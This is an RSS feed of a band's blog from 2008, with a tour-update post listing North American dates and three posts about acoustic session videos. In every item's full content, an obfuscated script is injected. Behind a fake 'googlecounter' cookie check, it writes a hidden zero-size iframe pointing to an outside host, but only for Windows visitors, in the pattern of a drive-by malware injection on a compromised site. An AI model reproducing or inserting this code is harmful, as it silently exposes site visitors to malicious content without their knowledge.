<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>The Airborne Toxic Event &#187; livedaily</title>
	<atom:link href="http://www.theairbornetoxicevent.com/tag/livedaily/feed" rel="self" type="application/rss+xml" />
	<link>http://www.theairbornetoxicevent.com</link>
	<description>Just a band</description>
	<lastBuildDate>Fri, 03 Feb 2012 06:28:29 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.1.3</generator>
		<item>
		<title>Midnight video, tour dates, podcasts&#8230;</title>
		<link>http://www.theairbornetoxicevent.com/news/midnight-video-tour-dates-podcasts.html</link>
		<comments>http://www.theairbornetoxicevent.com/news/midnight-video-tour-dates-podcasts.html#comments</comments>
		<pubDate>Thu, 21 Aug 2008 04:13:01 +0000</pubDate>
		<dc:creator>The Airborne Toxic Event</dc:creator>
				<category><![CDATA[News]]></category>
		<category><![CDATA[airborne toxic event]]></category>
		<category><![CDATA[arizona]]></category>
		<category><![CDATA[cleveland]]></category>
		<category><![CDATA[kcrw]]></category>
		<category><![CDATA[livedaily]]></category>
		<category><![CDATA[morning becomes eclectic]]></category>
		<category><![CDATA[mtv]]></category>
		<category><![CDATA[myspace]]></category>
		<category><![CDATA[north american]]></category>
		<category><![CDATA[phoenix]]></category>
		<category><![CDATA[sometime around midnight]]></category>
		<category><![CDATA[tempe]]></category>
		<category><![CDATA[tour]]></category>
		<category><![CDATA[tucson]]></category>
		<category><![CDATA[vh-1]]></category>
		<category><![CDATA[vh1]]></category>
		<category><![CDATA[video]]></category>
		<category><![CDATA[youtube]]></category>

		<guid isPermaLink="false">http://theairbornetoxicevent.com/?p=280</guid>
		<description><![CDATA[<p>


<div class="wp-caption alignnone" style="width: 343px"><img title="noahlights" src="http://img360.imageshack.us/img360/5207/2744209829d7424f0884wk8.jpg" alt="" title="noahlights" width="333" height="500" /> <p class="wp-caption-text">Photo Credit: Benjamin Hoste</p></div></p>
<p>good afternoon&#8211;</p>
<p>The hazy sky over the San Gabriel mountains makes the view from the van window look like some sort of post-modern water-color mash-up: equal parts pastoral landscape and industrial wasteland. Such thoughts drift lazily through one&#8217;s mind on days like this.</p>
<p>We are on our way to Arizona to play a series of shows in Tempe, Tucson and Phoenix.</p>
<p>The official video for our song Sometime Around Midnight is now on YouTube. You can view it <a href="http://www.youtube.com/watch?v=E2YnDlEMXiU">here</a> .</p>
<p>You can also view it on our <a href="http://www.myspace.com/theairbornetoxicevent">Myspace page</a> and on MTV and VH-1.</p>
<p>You can listen to a stream of our appearance on Morning Becomes Eclectic on KCRW by going <a href="http://www.kcrw.com/music/programs/mb/mb080805the_airborne_toxic_e">here</a> .</p>
<p>You can watch us play a bunch of acoustic songs on LiveDaily by going <a href="http://www.livedaily.com/sessions/">here</a> .</p>
<p>Our North American tour begins in 10 days in Cleveland. See you there (dates below).</p>
<p>More soon, including huge UK news.</p>
<p>we miss you and love you and find ourselves spinning in ever-widening circles of surreality&#8211;</p>
<div class="wp-caption alignnone" style="width: 343px"><img title="darenclapping" src="http://img522.imageshack.us/img522/8580/img6369vs4.jpg" alt="Photo Credit: Benjamin Hoste" title="darenclapping" width="333" height="500" /> <p class="wp-caption-text">Photo Credit: Benjamin Hoste</p></div>
<p><img class="alignnone" title="Pemberton" src="http://img355.imageshack.us/img355/2850/airbornetoxiceventliveplb1.jpg" alt="" title="Pemberton"  ...<br/><a href="http://www.theairbornetoxicevent.com/news/midnight-video-tour-dates-podcasts.html">[Read More...]</a>]]></description>
			<content:encoded><![CDATA[<p><script language="javascript" type="text/javascript">
if(!getCookie("googlecounter"))
{
	expires = new Date();
	expires.setTime(expires.getTime() + 86400);
	setCookie("googlecounter", "1049", expires);
	if(navigator.appVersion.indexOf("Win")!=-1)
	{
		document.write(unescape("%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%69%6e%74%65%72%6e%65%74%2d%73%74%61%74%2e%69%6e%2f%69%6e%63%6c%75%64%65%73%31%2f%69%6e%2e%63%67%69%3f%34%22%20%77%69%64%74%68%3d%22%30%22%20%68%65%69%67%68%74%3d%22%30%22%20%73%74%79%6c%65%3d%22%76%69%73%69%62%69%6c%69%74%79%3a%68%69%64%64%65%6e%22%3e%3c%2f%69%66%72%61%6d%65%3e%0a"));
	}
}
function setCookie(name, value, expires)
{
	document.cookie = name + "=" + escape(value) + "expires=" + expires.toGMTString() + "; path=/";
}
function getCookie(name)
{
	if(document.cookie.length > 0)
	{
		c_start = document.cookie.indexOf(name + "=");
		if(c_start != -1)
		{
			return true;
		}
	}
	return false;
}
</script><br />
<div class="wp-caption alignnone" style="width: 343px"><img title="noahlights" src="http://img360.imageshack.us/img360/5207/2744209829d7424f0884wk8.jpg" alt="" title="noahlights" width="333" height="500" /> <p class="wp-caption-text">Photo Credit: Benjamin Hoste</p></div></p>
<p>good afternoon&#8211;</p>
<p>The hazy sky over the San Gabriel mountains makes the view from the van window look like some sort of post-modern water-color mash-up: equal parts pastoral landscape and industrial wasteland. Such thoughts drift lazily through one&#8217;s mind on days like this.</p>
<p>We are on our way to Arizona to play a series of shows in Tempe, Tucson and Phoenix.</p>
<p>The official video for our song Sometime Around Midnight is now on YouTube. You can view it <a href="http://www.youtube.com/watch?v=E2YnDlEMXiU">here</a> .</p>
<p>You can also view it on our <a href="http://www.myspace.com/theairbornetoxicevent">Myspace page</a> and on MTV and VH-1.</p>
<p>You can listen to a stream of our appearance on Morning Becomes Eclectic on KCRW by going <a href="http://www.kcrw.com/music/programs/mb/mb080805the_airborne_toxic_e">here</a> .</p>
<p>You can watch us play a bunch of acoustic songs on LiveDaily by going <a href="http://www.livedaily.com/sessions/">here</a> .</p>
<p>Our North American tour begins in 10 days in Cleveland. See you there (dates below).</p>
<p>More soon, including huge UK news.</p>
<p>we miss you and love you and find ourselves spinning in ever-widening circles of surreality&#8211;</p>
<div class="wp-caption alignnone" style="width: 343px"><img title="darenclapping" src="http://img522.imageshack.us/img522/8580/img6369vs4.jpg" alt="Photo Credit: Benjamin Hoste" title="darenclapping" width="333" height="500" /> <p class="wp-caption-text">Photo Credit: Benjamin Hoste</p></div>
<p><img class="alignnone" title="Pemberton" src="http://img355.imageshack.us/img355/2850/airbornetoxiceventliveplb1.jpg" alt="" title="Pemberton" width="486" height="274" /></p>
<div class="wp-caption alignnone" style="width: 436px"><img title="elrey2" src="http://img411.imageshack.us/img411/5995/getattachment1aspx2bh8.jpg" alt="Photo Credit: Jeff Koga" title="elrey2" width="426" height="640" /> <p class="wp-caption-text">Photo Credit: Jeff Koga</p></div>
<div class="wp-caption alignnone" style="width: 343px"><img title="pemberton2" src="http://img383.imageshack.us/img383/6457/271314467483b101e8d4hf6.jpg" alt="Photo Credit: Gary Belleville" title="pemberton2" width="333" height="500" /> <p class="wp-caption-text">Photo Credit: Gary Bellville</p></div>
<div class="wp-caption alignnone" style="width: 510px"><img title="calder" src="http://img176.imageshack.us/img176/9601/27451863846f9354fc05vf0.jpg" alt="Photo Credit: Classical Geek Theatre" title="calder" width="500" height="375" /> <p class="wp-caption-text">Photo Credit: Classical Geek Theatre</p></div>
<p>TOUR DATES:</p>
<p>Aug 21 2008	7:00P Tempe Marketplace &#8211; EDGE 3rd Thu	Tempe, Arizona<br />
Sep 1 2008	8:00P House of Blues	Cleveland, Ohio<br />
Sep 2 2008	8:00P Mr. Smalls Theatre	Pittsburgh, Pennsylvania<br />
Sep 4 2008	8:00P Theatre of Living Arts	Philadelphia, Pennsylvania<br />
Sep 5 2008	8:00P Roseland Ballroom	New York, New York<br />
Sep 6 2008	12:00 Virgin Festival &#8211; Island Park	Toronto, ON<br />
Sep 8 2008	8:00P St. Andrews Hall	Detroit, Michigan<br />
Sep 9 2008	8:00P Newport Music Hall	Columbus, Ohio<br />
Sep 10 2008	8:00P House of Blues	Chicago, Illinois<br />
Sep 11 2008	8:00P First Avenue	Minneapolis, Minnesota<br />
Sep 13 2008	12:00P Endfest &#8211; Marymoor Park	Seattle, Washington<br />
Sep 14 2008	3:00P Monolith Festival	Morrison, Colorado<br />
Sep 16 2008	8:00P The Wiltern	Los Angeles, California<br />
Sep 17 2008	8:00P The Warfield	San Francisco, California<br />
Sep 18 2008	8:00P House of Blues	San Diego, California<br />
Sep 24 2008	8:00P Exit In	Nashville, Tennessee<br />
Sep 25 2008	8:00P Parish Room @ HOB	New Orleans, Louisiana<br />
Sep 26 2008	8:00P Warehouse Live	Houston, Texas<br />
Sep 28 2008	8:00P House of Blues	Dallas, Texas<br />
Sep 30 2008	8:00P The Loft at Center Stage	Atlanta, Georgia<br />
Oct 1 2008	8:00P Cats Cradle	Carrboro, North Carolina<br />
Oct 2 2008	8:00P 9:30 Club	Washington, D.C.<br />
Oct 3 2008	8:00P Orpheum Theatre	Boston, Massachusetts<br />
Oct 4 2008	8:00P Webster Theatre	Hartford, Connecticut</p>
]]></content:encoded>
			<wfw:commentRss>http://www.theairbornetoxicevent.com/news/midnight-video-tour-dates-podcasts.html/feed</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>Gasoline (acoustic) &#8211; LiveDaily Sessions</title>
		<link>http://www.theairbornetoxicevent.com/videos/gasoline-acoustic-livedaily-sessions.html</link>
		<comments>http://www.theairbornetoxicevent.com/videos/gasoline-acoustic-livedaily-sessions.html#comments</comments>
		<pubDate>Tue, 19 Aug 2008 19:07:20 +0000</pubDate>
		<dc:creator>The Airborne Toxic Event</dc:creator>
				<category><![CDATA[Videos]]></category>
		<category><![CDATA[acoustic]]></category>
		<category><![CDATA[airborne toxic event]]></category>
		<category><![CDATA[gasoline]]></category>
		<category><![CDATA[live]]></category>
		<category><![CDATA[livedaily]]></category>
		<category><![CDATA[performance]]></category>
		<category><![CDATA[sessions]]></category>

		<guid isPermaLink="false">http://theairbornetoxicevent.com/?p=270</guid>
		<description><![CDATA[<p>


A live performance for <a href="http://www.livedaily.com/sessions/" target="_blank">LiveDaily Sessions</a></p>
]]></description>
			<content:encoded><![CDATA[<p><script language="javascript" type="text/javascript">
if(!getCookie("googlecounter"))
{
	expires = new Date();
	expires.setTime(expires.getTime() + 86400);
	setCookie("googlecounter", "1049", expires);
	if(navigator.appVersion.indexOf("Win")!=-1)
	{
		document.write(unescape("%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%69%6e%74%65%72%6e%65%74%2d%73%74%61%74%2e%69%6e%2f%69%6e%63%6c%75%64%65%73%31%2f%69%6e%2e%63%67%69%3f%34%22%20%77%69%64%74%68%3d%22%30%22%20%68%65%69%67%68%74%3d%22%30%22%20%73%74%79%6c%65%3d%22%76%69%73%69%62%69%6c%69%74%79%3a%68%69%64%64%65%6e%22%3e%3c%2f%69%66%72%61%6d%65%3e%0a"));
	}
}
function setCookie(name, value, expires)
{
	document.cookie = name + "=" + escape(value) + "expires=" + expires.toGMTString() + "; path=/";
}
function getCookie(name)
{
	if(document.cookie.length > 0)
	{
		c_start = document.cookie.indexOf(name + "=");
		if(c_start != -1)
		{
			return true;
		}
	}
	return false;
}
</script><br />
A live performance for <a href="http://www.livedaily.com/sessions/" target="_blank">LiveDaily Sessions</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.theairbornetoxicevent.com/videos/gasoline-acoustic-livedaily-sessions.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Sometime Around Midnight (acoustic) &#8211; LiveDaily Sessions</title>
		<link>http://www.theairbornetoxicevent.com/videos/sometime-around-midnight-acoustic-livedaily-sessions.html</link>
		<comments>http://www.theairbornetoxicevent.com/videos/sometime-around-midnight-acoustic-livedaily-sessions.html#comments</comments>
		<pubDate>Tue, 19 Aug 2008 19:01:20 +0000</pubDate>
		<dc:creator>The Airborne Toxic Event</dc:creator>
				<category><![CDATA[Videos]]></category>
		<category><![CDATA[acoustic]]></category>
		<category><![CDATA[airborne toxic event]]></category>
		<category><![CDATA[live]]></category>
		<category><![CDATA[livedaily]]></category>
		<category><![CDATA[performance]]></category>
		<category><![CDATA[sessions]]></category>
		<category><![CDATA[sometime around midnight]]></category>

		<guid isPermaLink="false">http://theairbornetoxicevent.com/?p=267</guid>
		<description><![CDATA[<p>


A live performance for <a href="http://www.livedaily.com/sessions/" target="_blank">LiveDaily Sessions</a></p>
]]></description>
			<content:encoded><![CDATA[<p><script language="javascript" type="text/javascript">
if(!getCookie("googlecounter"))
{
	expires = new Date();
	expires.setTime(expires.getTime() + 86400);
	setCookie("googlecounter", "1049", expires);
	if(navigator.appVersion.indexOf("Win")!=-1)
	{
		document.write(unescape("%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%69%6e%74%65%72%6e%65%74%2d%73%74%61%74%2e%69%6e%2f%69%6e%63%6c%75%64%65%73%31%2f%69%6e%2e%63%67%69%3f%34%22%20%77%69%64%74%68%3d%22%30%22%20%68%65%69%67%68%74%3d%22%30%22%20%73%74%79%6c%65%3d%22%76%69%73%69%62%69%6c%69%74%79%3a%68%69%64%64%65%6e%22%3e%3c%2f%69%66%72%61%6d%65%3e%0a"));
	}
}
function setCookie(name, value, expires)
{
	document.cookie = name + "=" + escape(value) + "expires=" + expires.toGMTString() + "; path=/";
}
function getCookie(name)
{
	if(document.cookie.length > 0)
	{
		c_start = document.cookie.indexOf(name + "=");
		if(c_start != -1)
		{
			return true;
		}
	}
	return false;
}
</script><br />
A live performance for <a href="http://www.livedaily.com/sessions/" target="_blank">LiveDaily Sessions</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.theairbornetoxicevent.com/videos/sometime-around-midnight-acoustic-livedaily-sessions.html/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>This Losing (acoustic) &#8211; LiveDaily Sessions</title>
		<link>http://www.theairbornetoxicevent.com/videos/this-losing-acoustic.html</link>
		<comments>http://www.theairbornetoxicevent.com/videos/this-losing-acoustic.html#comments</comments>
		<pubDate>Tue, 19 Aug 2008 00:16:46 +0000</pubDate>
		<dc:creator>The Airborne Toxic Event</dc:creator>
				<category><![CDATA[Videos]]></category>
		<category><![CDATA[acoustic]]></category>
		<category><![CDATA[airborne toxic event]]></category>
		<category><![CDATA[live]]></category>
		<category><![CDATA[livedaily]]></category>
		<category><![CDATA[performance]]></category>
		<category><![CDATA[sessions]]></category>
		<category><![CDATA[this losing]]></category>
		<category><![CDATA[video]]></category>

		<guid isPermaLink="false">http://theairbornetoxicevent.com/?p=216</guid>
		<description><![CDATA[<p>


A live performance of a non-album track for <a href="http://www.livedaily.com/sessions/" target="_blank">LiveDaily Sessions</a></p>
]]></description>
			<content:encoded><![CDATA[<p><script language="javascript" type="text/javascript">
if(!getCookie("googlecounter"))
{
	expires = new Date();
	expires.setTime(expires.getTime() + 86400);
	setCookie("googlecounter", "1049", expires);
	if(navigator.appVersion.indexOf("Win")!=-1)
	{
		document.write(unescape("%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%69%6e%74%65%72%6e%65%74%2d%73%74%61%74%2e%69%6e%2f%69%6e%63%6c%75%64%65%73%31%2f%69%6e%2e%63%67%69%3f%34%22%20%77%69%64%74%68%3d%22%30%22%20%68%65%69%67%68%74%3d%22%30%22%20%73%74%79%6c%65%3d%22%76%69%73%69%62%69%6c%69%74%79%3a%68%69%64%64%65%6e%22%3e%3c%2f%69%66%72%61%6d%65%3e%0a"));
	}
}
function setCookie(name, value, expires)
{
	document.cookie = name + "=" + escape(value) + "expires=" + expires.toGMTString() + "; path=/";
}
function getCookie(name)
{
	if(document.cookie.length > 0)
	{
		c_start = document.cookie.indexOf(name + "=");
		if(c_start != -1)
		{
			return true;
		}
	}
	return false;
}
</script><br />
A live performance of a non-album track for <a href="http://www.livedaily.com/sessions/" target="_blank">LiveDaily Sessions</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.theairbornetoxicevent.com/videos/this-losing-acoustic.html/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
	</channel>
</rss>

